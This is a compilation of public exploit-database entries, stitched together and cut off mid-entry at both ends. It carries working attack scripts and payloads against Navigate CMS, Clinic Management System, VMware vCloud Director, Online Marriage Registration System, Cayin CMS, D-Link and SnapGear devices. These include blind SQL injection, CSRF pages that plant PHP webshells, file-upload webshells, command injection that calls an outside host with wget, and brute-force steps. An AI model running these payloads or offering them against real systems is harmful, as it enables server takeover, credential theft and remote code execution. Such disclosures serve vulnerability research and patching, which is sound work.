http://victim.com/path/eotools_files/files/shell.php ========================================================== ========================================================== Greetz To : @zigo0o - Alnjm33 - ShoOt3r - red virus - pRedAtOr - Elkatrez Elmodamer - Egy-sn!p3r [ALL MUSLIM AND ARAB HACKERS] ==========================================================

# Exploit Title: Navigate CMS 2.8.7 - ''sidx' SQL Injection (Authenticated) # Date: 2020-06-04 # Exploit Author: Gus Ralph # Vendor Homepage: https://www.navigatecms.com/en/home # Software Link: https://sourceforge.net/projects/navigatecms/files/releases/navigate-2.8.7r1401.zip/download # Version: 2.8.7 # Tested on: Ubuntu # CVE: N/A # This script will leak the "activation_key" value for the user who's ID is set to 1 in the database. # The activation key can be used to reset that user's password to whatever you want, bypassing the need to crack a hash. # An example password reset URL would be: `/login.php?action=password-reset&value=[ACTIVATION CODE LEAKED FROM DB]` import requests, time, string user = raw_input("Please enter your username: \n") password = raw_input("Please enter your password: \n") URL = raw_input("Enter the target URL (in this format 'http://domain.com/navigate/'): \n") s = requests.Session() data = {'login-username': (None, user), 'login-password':(None, password)} s.post(url = URL + "login.php", files = data) dictionary = string.ascii_lowercase + string.ascii_uppercase + string.digits final = "" while True: for x in dictionary: payload = '(SELECT (CASE WHEN EXISTS(SELECT password FROM nv_users WHERE activation_key REGEXP BINARY "^' + str(final) + x + '.*" AND id = 1) THEN (SELECT sleep(5)) ELSE date_created END)); -- -' r = s.post(url = URL + "/navigate.php?fid=comments&act=1&rows=1&sidx=" + payload) if int(r.elapsed.total_seconds()) > 4: final += x print "Leaking contents of admin hash: " + final break else: pass

# Exploit Title: Navigate CMS 2.8.7 - Cross-Site Request Forgery (Add Admin) # Date: 2020-06-04 # Exploit Author: Gus Ralph # Vendor Homepage: https://www.navigatecms.com/en/home # Software Link: https://sourceforge.net/projects/navigatecms/files/releases/navigate-2.8.7r1401.zip/download # Version: 2.8.7 # Tested on: Ubuntu # CVE: <!-- After having an authenticated admin access this HTML page, simply go to as an unauthenticated user (path may slightly vary depending on installation location): http://DOMAIN.com/navigate/plugins/chiv/chiv.php --> <script> var logUrl = "http://localhost/navigate/navigate.php?fid=extensions&act=extension_upload"; function byteValue(x) { return x.charCodeAt(0) & 0xff; } function toBytes(datastr) { var ords = Array.prototype.map.call(datastr, byteValue); var ui8a = new Uint8Array(ords); return ui8a.buffer; } if (typeof XMLHttpRequest.prototype.sendAsBinary == 'undefined' && Uint8Array) { XMLHttpRequest.prototype.sendAsBinary = function(datastr) { this.send(toBytes(datastr)); } } function fileUpload(fileData, fileName) { var fileSize = fileData.length, boundary = "---------------------------399386530342483226231822376790", uri = logUrl, xhr = new XMLHttpRequest(); var additionalFields = { } var fileFieldName = "extension-upload"; xhr.open("POST", uri, true); xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8") xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary="+boundary); // simulate a file MIME POST request. xhr.setRequestHeader("Content-Length", fileSize); xhr.withCredentials = "true"; xhr.onreadystatechange = function() { if (xhr.readyState == 4) { if ((xhr.status >= 200 && xhr.status <= 200) || xhr.status == 304) { if (xhr.responseText != "") { alert(JSON.parse(xhr.responseText).msg); // display response. } } else if (xhr.status == 0) { $("#goto").show(); } } } var body = ""; for (var i in additionalFields) { if (additionalFields.hasOwnProperty(i)) { body += addField(i, additionalFields[i], boundary); } } body += addFileField(fileFieldName, fileData, fileName, boundary); body += "--" + boundary + "--"; xhr.sendAsBinary(body); return true; } function addField(name, value, boundary) { var c = "--" + boundary + "\r\n" c += "Content-Disposition: form-data; name='" + name + "'\r\n\r\n"; c += value + "\r\n"; return c; } function addFileField(name, value, filename, boundary) { var c = "--" + boundary + "\r\n" c += "Content-Disposition: form-data; name='" + name + "'; filename='" + filename + "'\r\n"; c += "Content-Type: application/zip\r\n\r\n"; c += value + "\r\n"; return c; } var start = function() { var c = "\x50\x4b\x03\x04\x0a\x00\x00\x00\x00\x00\x77\x9e\x97\x50\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x1c\x00\x63\x68\x69\x76\x2f\x55\x54\x09\x00\x03\xc2\xe3\xa1\x5e\xdb\xe3\xa1\x5e\x75\x78\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00\x50\x4b\x03\x04\x14\x00\x00\x00\x08\x00\xa4\x9d\x97\x50\x02\x75\x9f\x67\x85\x00\x00\x00\xc0\x00\x00\x00\x10\x00\x1c\x00\x63\x68\x69\x76\x2f\x63\x68\x69\x76\x2e\x70\x6c\x75\x67\x69\x6e\x55\x54\x09\x00\x03\x33\xe2\xa1\x5e\x42\xe2\xa1\x5e\x75\x78\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00\x55\x8d\x41\x0a\xc2\x30\x10\x45\xf7\x39\xc5\x90\xb5\x34\x48\x17\x42\x57\x4a\xc9\x05\xea\x09\x62\x32\x90\xa0\xe9\x84\x64\x5a\x15\xf1\xee\xda\xd8\x2e\xfc\xcb\xff\x1e\xff\xbf\x04\x7c\x23\x39\xf0\x0d\x65\x07\xf2\x34\xc0\x59\x6b\xd0\x72\xf7\x03\x33\xe6\x12\x68\x5c\xd0\xbe\x69\xdb\xc3\xd6\x9b\x89\x3d\xe5\xa5\xee\x7d\x98\x0d\xd3\x06\xee\x78\x29\x81\xeb\x96\x67\x4e\xa5\x53\xca\x1b\x7b\x8d\xae\x09\xa4\x8e\xf6\x5f\x76\x58\x6c\x0e\x89\xd7\x87\x01\x23\x31\x42\x4f\x31\x9a\xd1\x81\x7e\xa0\x9d\x2a\x5b\x75\x7e\xa6\x3a\xbc\x7d\x88\xb7\xf8\x00\x50\x4b\x03\x04\x0a\x00\x00\x00\x00\x00\x1c\x9e\x97\x50\x37\x55\x33\xfd\x3b\x00\x00\x00\x3b\x00\x00\x00\x15\x00\x1c\x00\x63\x68\x69\x76\x2f\x63\x68\x69\x76\x2e\x69\x6e\x66\x6f\x2e\x70\x6c\x75\x67\x69\x6e\x55\x54\x09\x00\x03\x18\xe3\xa1\x5e\x06\xe3\xa1\x5e\x75\x78\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00\x3c\x68\x31\x3e\x57\x65\x6c\x63\x6f\x6d\x65\x20\x74\x6f\x20\x43\x68\x69\x76\x61\x74\x6f\x27\x73\x20\x52\x43\x45\x20\x70\x6c\x75\x67\x69\x6e\x20\x66\x6f\x72\x20\x4e\x61\x76\x69\x67\x61\x74\x65\x20\x43\x4d\x53\x2e\x3c\x2f\x68\x31\x3e\x0a\x50\x4b\x03\x04\x0a\x00\x00\x00\x00\x00\x71\x9e\x97\x50\xfa\x43\x48\xab\x1f\x00\x00\x00\x1f\x00\x00\x00\x0d\x00\x1c\x00\x63\x68\x69\x76\x2f\x63\x68\x69\x76\x2e\x70\x68\x70\x55\x54\x09\x00\x03\xb5\xe3\xa1\x5e\xa4\xe3\xa1\x5e\x75\x78\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00\x3c\x3f\x70\x68\x70\x20\x73\x79\x73\x74\x65\x6d\x28\x24\x5f\x47\x45\x54\x5b\x27\x63\x6d\x64\x27\x5d\x29\x3b\x20\x3f\x3e\x0a\x50\x4b\x01\x02\x1e\x03\x0a\x00\x00\x00\x00\x00\x77\x9e\x97\x50\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x18\x00\x00\x00\x00\x00\x00\x00\x10\x00\xff\x41\x00\x00\x00\x00\x63\x68\x69\x76\x2f\x55\x54\x05\x00\x03\xc2\xe3\xa1\x5e\x75\x78\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00\x50\x4b\x01\x02\x1e\x03\x14\x00\x00\x00\x08\x00\xa4\x9d\x97\x50\x02\x75\x9f\x67\x85\x00\x00\x00\xc0\x00\x00\x00\x10\x00\x18\x00\x00\x00\x00\x00\x01\x00\x00\x00\xff\x81\x3f\x00\x00\x00\x63\x68\x69\x76\x2f\x63\x68\x69\x76\x2e\x70\x6c\x75\x67\x69\x6e\x55\x54\x05\x00\x03\x33\xe2\xa1\x5e\x75\x78\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00\x50\x4b\x01\x02\x1e\x03\x0a\x00\x00\x00\x00\x00\x1c\x9e\x97\x50\x37\x55\x33\xfd\x3b\x00\x00\x00\x3b\x00\x00\x00\x15\x00\x18\x00\x00\x00\x00\x00\x01\x00\x00\x00\xa4\x81\x0e\x01\x00\x00\x63\x68\x69\x76\x2f\x63\x68\x69\x76\x2e\x69\x6e\x66\x6f\x2e\x70\x6c\x75\x67\x69\x6e\x55\x54\x05\x00\x03\x18\xe3\xa1\x5e\x75\x78\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00\x50\x4b\x01\x02\x1e\x03\x0a\x00\x00\x00\x00\x00\x71\x9e\x97\x50\xfa\x43\x48\xab\x1f\x00\x00\x00\x1f\x00\x00\x00\x0d\x00\x18\x00\x00\x00\x00\x00\x01\x00\x00\x00\xa4\x81\x98\x01\x00\x00\x63\x68\x69\x76\x2f\x63\x68\x69\x76\x2e\x70\x68\x70\x55\x54\x05\x00\x03\xb5\xe3\xa1\x5e\x75\x78\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00\x50\x4b\x05\x06\x00\x00\x00\x00\x04\x00\x04\x00\x4f\x01\x00\x00\xfe\x01\x00\x00\x00\x00" fileUpload(c, "chiv.zip"); }; start(); </script>

# Exploit Title: Clinic Management System 1.0 - Authenticated Arbitrary File Upload # Google Dork: N/A # Date: 2020-06-02 # Exploit Author: BKpatron # Vendor Homepage: https://www.sourcecodester.com/php/14243/open-source-clinic-management-system-php-full-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/Nikhil_B/clinic-full-source-code-with-database_0.zip # Version: v1.0 # Tested on: Win 10 # CVE: N/A # Vulnerability: Clinic Management System version 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file. # vulnerable file : manage_website.php # Details: login to website as patient then access the 'localhost/source%20code/manage_website.php' page, as it does not check for an admin user. change website logo and upload your malicious php file(<?php echo shell_exec($_GET["cmd"]); ?>). if you see this message "Something Went Wrong" You have successfully uploaded the malicious php file. path of your file: http://localhost/source%20code/uploadImage/Logo/your_file.php # Proof of Concept: http://localhost/source%20code/manage_website.php POST /source%20code/manage_website.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------135192786613366 Content-Length: 2539 Referer: http://localhost/source%20code/manage_website.php Cookie: PHPSESSID=qdh5f7kelhhe9uvafveafit5e1 Connection: keep-alive Upgrade-Insecure-Requests: 1 -----------------------------58631544014332: undefined Content-Disposition: form-data; name="title" -----------------------------58631544014332 Content-Disposition: form-data; name="short_title" -----------------------------58631544014332 Content-Disposition: form-data; name="footer" -----------------------------58631544014332 Content-Disposition: form-data; name="currency_code" -----------------------------58631544014332 Content-Disposition: form-data; name="currency_symbol" -----------------------------58631544014332 Content-Disposition: form-data; name="old_website_image" logo for hospital system.jpg -----------------------------58631544014332 Content-Disposition: form-data; name="website_image"; filename="shell.php" Content-Type: application/octet-stream <?php echo shell_exec($_GET["cmd"]); ?>

# Exploit Title: VMWAre vCloud Director 9.7.0.15498291 - Remote Code Execution # Exploit Author: Tomas Melicher # Technical Details: https://citadelo.com/en/blog/full-infrastructure-takeover-of-vmware-cloud-director-CVE-2020-3956/ # Date: 2020-05-24 # Vendor Homepage: https://www.vmware.com/ # Software Link: https://www.vmware.com/products/cloud-director.html # Tested On: vCloud Director 9.7.0.15498291 # Vulnerability Description: # VMware vCloud Director suffers from an Expression Injection Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) via submitting malicious value as a SMTP host name. #!/usr/bin/python import argparse # pip install argparse import base64, os, re, requests, sys if sys.version_info >= (3, 0): from urllib.parse import urlparse else: from urlparse import urlparse from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) PAYLOAD_TEMPLATE = "${''.getClass().forName('java.io.BufferedReader').getDeclaredConstructors()[1].newInstance(''.getClass().forName('java.io.InputStreamReader').getDeclaredConstructors()[3].newInstance(''.getClass().forName('java.lang.ProcessBuilder').getDeclaredConstructors()[0].newInstance(['bash','-c','echo COMMAND|base64 -di|bash|base64 -w 0']).start().getInputStream())).readLine()}" session = requests.Session() def login(url, username, password, verbose): target_url = '%s://%s%s'%(url.scheme, url.netloc, url.path) res = session.get(target_url) match = re.search(r'tenant:([^"]+)', res.content, re.IGNORECASE) if match: tenant = match.group(1) else: print('[!] can\'t find tenant identifier') return if verbose: print('[*] tenant: %s'%(tenant)) match = re.search(r'security_check\?[^"]+', res.content, re.IGNORECASE) if match: # Cloud Director 9.* login_url = '%s://%s/login/%s'%(url.scheme, url.netloc, match.group(0)) res = session.post(login_url, data={'username':username,'password':password}) if res.status_code == 401: print('[!] invalid credentials') return else: # Cloud Director 10.* match = re.search(r'/cloudapi/.*/sessions', res.content, re.IGNORECASE) if match: login_url = '%s://%s%s'%(url.scheme, url.netloc, match.group(0)) headers = { 'Authorization': 'Basic %s'%(base64.b64encode('%s@%s:%s'%(username,tenant,password))), 'Accept': 'application/json;version=29.0', 'Content-type': 'application/json;version=29.0' } res = session.post(login_url, headers=headers) if res.status_code == 401: print('[!] invalid credentials') return else: print('[!] url for login form was not found') return cookies = session.cookies.get_dict() jwt = cookies['vcloud_jwt'] session_id = cookies['vcloud_session_id'] if verbose: print('[*] jwt token: %s'%(jwt)) print('[*] session_id: %s'%(session_id)) res = session.get(target_url) match = re.search(r'organization : \'([^\']+)', res.content, re.IGNORECASE) if match is None: print('[!] organization not found') return organization = match.group(1) if verbose: print('[*] organization name: %s'%(organization)) match = re.search(r'orgId : \'([^\']+)', res.content) if match is None: print('[!] orgId not found') return org_id = match.group(1) if verbose: print('[*] organization identifier: %s'%(org_id)) return (jwt,session_id,organization,org_id) def exploit(url, username, password, command, verbose): (jwt,session_id,organization,org_id) = login(url, username, password, verbose) headers = { 'Accept': 'application/*+xml;version=29.0', 'Authorization': 'Bearer %s'%jwt, 'x-vcloud-authorization': session_id } admin_url = '%s://%s/api/admin/'%(url.scheme, url.netloc) res = session.get(admin_url, headers=headers) match = re.search(r'<description>\s*([^<\s]+)', res.content, re.IGNORECASE) if match: version = match.group(1) if verbose: print('[*] detected version of Cloud Director: %s'%(version)) else: version = None print('[!] can\'t find version of Cloud Director, assuming it is more than 10.0') email_settings_url = '%s://%s/api/admin/org/%s/settings/email'%(url.scheme, url.netloc, org_id) payload = PAYLOAD_TEMPLATE.replace('COMMAND', base64.b64encode('(%s) 2>&1'%command)) data = '<root:OrgEmailSettings xmlns:root="http://www.vmware.com/vcloud/v1.5"><root:IsDefaultSmtpServer>false</root:IsDefaultSmtpServer>' data += '<root:IsDefaultOrgEmail>true</root:IsDefaultOrgEmail><root:FromEmailAddress/><root:DefaultSubjectPrefix/>' data += '<root:IsAlertEmailToAllAdmins>true</root:IsAlertEmailToAllAdmins><root:AlertEmailTo/><root:SmtpServerSettings>' data += '<root:IsUseAuthentication>false</root:IsUseAuthentication><root:Host>%s</root:Host><root:Port>25</root:Port>'%(payload) data += '<root:Username/><root:Password/></root:SmtpServerSettings></root:OrgEmailSettings>' res = session.put(email_settings_url, data=data, headers=headers) match = re.search(r'value:\s*\[([^\]]+)\]', res.content) if verbose: print('') try: print(base64.b64decode(match.group(1))) except Exception: print(res.content) parser = argparse.ArgumentParser(usage='%(prog)s -t target -u username -p password [-c command] [--check]') parser.add_argument('-v', action='store_true') parser.add_argument('-t', metavar='target', help='url to html5 client (http://example.com/tenant/my_company)', required=True) parser.add_argument('-u', metavar='username', required=True) parser.add_argument('-p', metavar='password', required=True) parser.add_argument('-c', metavar='command', help='command to execute', default='id') args = parser.parse_args() url = urlparse(args.t) exploit(url, args.u, args.p, args.c, args.v)

# Exploit Title: Navigate CMS 2.8.7 - Authenticated Directory Traversal # Date: 2020-06-04 # Exploit Author: Gus Ralph # Vendor Homepage: https://www.navigatecms.com/en/home # Software Link: https://sourceforge.net/projects/navigatecms/files/releases/navigate-2.8.7r1401.zip/download # Version: 2.8.7 # Tested on: Ubuntu # CVE: CVE-2020-13795 A malicious user can abuse the authenticated templates functionality to traverse out of the templates directory to read and write to any file on the webserver as www-data. For this vulnerability, I looked into the "templates" feature of the application. It seems we can edit any file in the application's templates directory, for example: `/var/www/html/navigate/private/1/templates/` My initial thought was to traverse out of the current directory and read the global config file (located at `/var/www/html/navigate/cfg/globals.php`). My payload would then consist of creating a template, setting the path to be `/var/www/html/navigate/private/1/templates/../../../cfg/globals.php` Furthermore, this can be abused to write to a PHP file and gain RCE on the remote server, for example: Traversal payload: `../../../navigate.php` PHP Code execution payload: ``` <?php system($_GET['cmd']); ?> ```

# Exploit Title: Online Marriage Registration System 1.0 Remote Code Execution # Google Dork: N/A # Date: 2020-05-31 # Exploit Author: Selim Enes 'Enesdex' Karaduman # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/online-marriage-registration-system-using-php-and-mysql/ # Version: 1.0 # Tested on: Windows 10 / Xampp Server and Wamp Server # CVE : N/A # Notes : Exploit Requires Authentication But You Can Register As User For Free, This Is Enough To Exploit System #!/bin/bash echo "# Online Marriage Registration System 1.0 ---> Remote Code Execution" echo "# Author ---> Selim Enes Karaduman" echo "# Usage ---> ./exploit.sh -u TARGET_URL(e.g http://10.10.10.10/omrs/ -m MOBILE_NUMBER -p PASSWORD -c COMMAND" while getopts u:m:p:c: par do case $par in u) url=$OPTARG ;; m) mnum=$OPTARG ;; p) passwd=$OPTARG ;; c) command=$OPTARG ;; esac done sess=$(curl -s -i -X POST $url/user/login.php -d "mobno=$mnum&password=$passwd&login=" | grep -F "Set-Cookie" | sed 's/;//g' | cut -d " " -f 2) url_for_req=$(echo $url | cut -d "/" -f 3) function upload(){ curl -i -s -k -X $'POST' \ -H $"Host: $url_for_req" -H $'Content-Type: multipart/form-data; boundary=---------------------------8759967759481129101498329242' -H $"Cookie: $sess" -H $'Content-Length: 3244' \ -b $"$sess" \ --data-binary $'-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"dom\"\x0d\x0a\x0d\x0a05/01/2020\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"nofhusband\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"husimage\"; filename=\"a.php\"\x0d\x0aContent-Type: application/x-php\x0d\x0a\x0d\x0a<?php\x0aecho system($_GET[\'cmd\']);\x0a?>\x0a\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"hreligion\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"hdob\"\x0d\x0a\x0d\x0a05/01/2020\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"hsbmarriage\"\x0d\x0a\x0d\x0aBachelor\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"haddress\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"hzipcode\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"hstate\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"hadharno\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"nofwife\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"wifeimage\"; filename=\"test.jpg\"\x0d\x0aContent-Type: image/jpeg\x0d\x0a\x0d\x0ahi\x0a\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"wreligion\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"wdob\"\x0d\x0a\x0d\x0a05/01/2020\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"wsbmarriage\"\x0d\x0a\x0d\x0aBachelor\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"waddress\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"wzipcode\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"wstate\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"wadharno\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"witnessnamef\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"waddressfirst\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"witnessnames\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"waddresssec\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"witnessnamet\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"waddressthird\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"submit\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------8759967759481129101498329242--\x0d\x0a' \ $"$url/user/marriage-reg-form.php" >>/dev/null } upload #Execute the given command shell_file=$(curl -s $url/user/images/ | grep ".php" | grep -Eo 'href="[^\"]+"' | sed 's/href=//g' | sed 's/\"//g' | grep -m1 '') check=$(echo $command | grep " " | wc -l) if [[ $check > 0 ]] then fixed_command=$(echo $command | sed 's/ /%20/g') curl -s "$url/user/images/$shell_file?cmd=$fixed_command" else curl -s "$url/user/images/$shell_file?cmd=$command" fi echo "IF YOU DONT GET RESPONSE OF THE COMMAND YOU GAVE, PROBABLY YOU GAVE WRONG CREDENTIALS" echo "After first exploit, even if you give wrong credentials it'll work since the file is already uploaded" shift $((OPTIND-1))

# Exploit Title: D-Link DIR-615 T1 20.10 - CAPTCHA Bypass # Date: 2019-10-12 # Exploit Author: huzaifa hussain # Vendor Homepage: https://in.dlink.com/ # Version: DIR-615 T1 ver:20.10 # Tested on: D-LINK ROUTER "MODEL NO: DIR-615" with "FIRMWARE VERSION:20.10" & "HARDWARE VERSION:T1 # CVE: CVE-2019-17525 D-LINK ROUTER "MODEL NO: DIR-615" with "FIRMWARE VERSION:20.10" & "HARDWARE VERSION:T1 A vulnerability found on login-in page of D-LINK ROUTER "DIR-615" with "FIRMWARE VERSION:20.10" & "HARDWARE VERSION:T1" which allows attackers to easily bypass CAPTCHA on login page by BRUTEFORCING. ------------------------------------ D-Link released new firmware designed to protect against logging in to the router using BRUTEFORCING. There is a flaw in the captcha authentication system that allows an attacker to reuse the same captcha without reloading new. ATTACK SCENARIO AND REPRODUCTION STEPS 1: Find the ROUTER LoginPage. 2: Fill the required login credentials. 3: Fill the CAPTCH properly and Intercept the request in Burpsuit. 4: Send the Request to Intruder and select the target variables i.e. username & password which will we bruteforce under Positions Tab 5: Set the payloads on target variables i.e. username & password under Payloads Tab. 5: Set errors in (the validatecode is invalid & username or password error, try again) GREP-MATCH under Options Tab. 6: Now hit the start attack and you will find the correct credentials. ------------------------------------- Huzaifa Hussain

# Title: Cayin Content Management Server 11.0 - Remote Command Injection (root) # Author:LiquidWorm # Date: 2020-06-04 # Vendor: https://www.cayintech.com # CVE: N/A Cayin Content Management Server 11.0 Root Remote Command Injection Vendor: CAYIN Technology Co., Ltd. Product web page: https://www.cayintech.com Affected version: CMS-SE v11.0 Build 19179 CMS-SE v11.0 Build 19025 CMS-SE v11.0 Build 18325 CMS Station (CMS-SE-LXC) CMS-60 v11.0 Build 19025 CMS-40 v9.0 Build 14197 CMS-40 v9.0 Build 14099 CMS-40 v9.0 Build 14093 CMS-20 v9.0 Build 14197 CMS-20 v9.0 Build 14092 CMS v8.2 Build 12199 CMS v8.0 Build 11175 CMS v7.5 Build 11175 Summary: CAYIN Technology provides Digital Signage solutions, including media players, servers, and software designed for the DOOH (Digital Out-of-home) networks. We develop industrial-grade digital signage appliances and tailored services so you don't have to do the hard work. Desc: CAYIN CMS suffers from an authenticated OS semi-blind command injection vulnerability using default credentials. This can be exploited to inject and execute arbitrary shell commands as the root user through the 'NTP_Server_IP' HTTP POST parameter in system.cgi page. Tested on: Apache/1.3.42 (Unix) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2020-5570 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5570.php 15.05.2020 --- Session created with default credentials (webadmin:bctvadmin). HTTP POST Request: ----------------- POST /cgi-bin/system.cgi HTTP/1.1 Host: 192.168.1.3 Content-Length: 201 Pragma: no-cache Cache-Control: no-cache Upgrade-Insecure-Requests: 1 User-Agent: Smith Origin: http://192.168.1.3 Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.1.3/cgi-bin/system.cgi Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: cy_lang=ZH_TW; cy_us=67176fd7d3d05812008; cy_en=c8bef8607e54c99059cc6a36da982f9c009; WEB_STR_RC_MGR=RC_MGR_WEB_PLAYLIST; WEB_STR_SYSTEM=SYSTEM_SETTING; cy_cgi_tp=1591206269_15957 Connection: close save_system: 1 system_date: 2020/5/16 06:36:48 TIMEZONE: 49 NTP_Service: 1 NTP_Server_IP: $(wget -q -U 'MyVoiceIsMyPassportVerifyMe' vrfy.zeroscience.mk) TEST_NTP: 測試 reboot1: 1 reboot_sel1: 4 reboot_sel2: 1 reboot_sel3: 1 font_list: ZH_TW Request recorder @ ZSL: ----------------------- Origin of HTTP request: 192.168.1.3:61347 HTTP GET request to vrfy.zeroscience.mk: GET / HTTP/1.0 User-Agent: MyVoiceIsMyPassportVerifyMe Host: vrfy.zeroscience.mk Accept: */* Connection: Keep-Alive PoC script: ----------- import requests url = "http://192.168.1.3:80/cgi-bin/system.cgi" cookies = {"cy_lang": "ZH_TW", "cy_us": "67176fd7d3d05812008", "cy_en": "c8bef8607e54c99059cc6a36da982f9c009", "WEB_STR_RC_MGR": "RC_MGR_WEB_PLAYLIST", "WEB_STR_SYSTEM": "SYSTEM_SETTING", "cy_cgi_tp": "1591206269_15957"} headers = {"Cache-Control": "max-age=0", "Origin": "http://192.168.1.3", "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Smith", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": "http://192.168.1.3/cgi-bin/system.cgi", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close"} data = {"save_system": "1", "system_date": "2020/5/16 06:36:48", "TIMEZONE": "49", "NTP_Service": "1", "NTP_Server_IP": "$(wget -q -U 'MyVoiceIsMyPassportVerifyMe' vrfy.zeroscience.mk)", # `cmd` or &cmd& "TEST_NTP": "\xe6\xb8\xac\xe8\xa9\xa6", "reboot1": "1", "reboot_sel1": "4", "reboot_sel2": "1", "reboot_sel3": "1", "font_list": "ZH_TW"} requests.post(url, headers=headers, cookies=cookies, data=data)

# Title: SnapGear Management Console SG560 3.1.5 - Cross-Site Request Forgery (Add Super User) # Author: LiquidWorm # Date: 2020-06-04 # Vendor: http://www.securecomputing.com # CVE: N/A Secure Computing SnapGear Management Console SG560 v3.1.5 CSRF Add Super User Vendor: Secure Computing Corp. Product web page: http://www.securecomputing.com Affected version: 3.1.5u1 Summary: The SG gateway appliance range provides Internet security and privacy of communications for small and medium enterprises, and branch offices. It simply and securely connects your office to the Internet, and with its robust stateful firewall, shields your computers from external threats. Desc: The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. Tested on: fnord/1.9 Apache 1.3.27 (Unix) Linux 2.4.31 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2020-5567 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5567.php 14.05.2020 -- CSRF Add Super User: -------------------- <html> <body> <form action="http://10.0.2.2/cgi-bin/cgix/adminusers" method="POST"> <input type="hidden" name=".form" value="edit" /> <input type="hidden" name=".page" value="adminusers_edit" /> <input type="hidden" name="login" value="testingus" /> <input 